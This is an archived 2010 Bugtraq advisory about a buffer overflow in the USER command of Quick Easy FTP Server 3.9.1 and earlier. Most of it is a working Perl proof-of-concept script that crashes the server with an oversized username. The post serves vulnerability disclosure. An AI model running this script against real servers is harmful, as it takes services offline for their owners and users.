| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Wed, 4 Aug 2010 15:22:17 +0800
From: "黄超毅" <huang_chaoyi@...ustech.com.cn>
To: "bugtraq" <bugtraq@...ts2.securityfocus.com>
Cc: "bugtraq" <bugtraq@...urityfocus.com>
Subject: Quick Easy FTP Server USER command Vulnerability
Software: Quick Easy FTP Server <=3.9.1
Vulnerability Published :2010-07-22
Vulnerability Update Time :2010-07-25
Vendor: No vendor response
Impact: Low
Bug Description:
Quick Easy FTP Server does not validate the USER command input size leading to a Denial Of
Service flaw while sending more than 1600 characters to it.
PoC:
****************************************************************
#!/usr/bin/perl -w
#DoS Exploit of Quick Easy Ftp Server version <=3.9.1 USER COMMAND Buffer Overflow
#Vulnerability Discoverer & Autor : demonalex[at]163[dot]com
use Socket;
$host=shift;
$port=shift || '21';
if(!defined($host)){
die("usage: $0 \$host [\$port]\n");
}
#$payload='A'x1604;
$payload=('A'x1600)."\x3D\x41\x41\x41"; #mov dword ptr [ebx+4], ebp
$target_ip=inet_aton($host);
$target=sockaddr_in($port, $target_ip);
socket(SOCK, AF_INET, SOCK_STREAM, 6);
connect(SOCK, $target);
undef($content);
recv(SOCK, $content, 100, 0); #get ftp banner
send(SOCK, "USER "."$payload\r\n", 0);
printf("send ok!\n");
close(SOCK);
exit(0);
****************************************************************
Credits: This vulnerability was discovered by demonalex@....com
Pentester/Researcher
Dark2S Security Team/Venustech.GZ Branch
Powered by blists - more mailing lists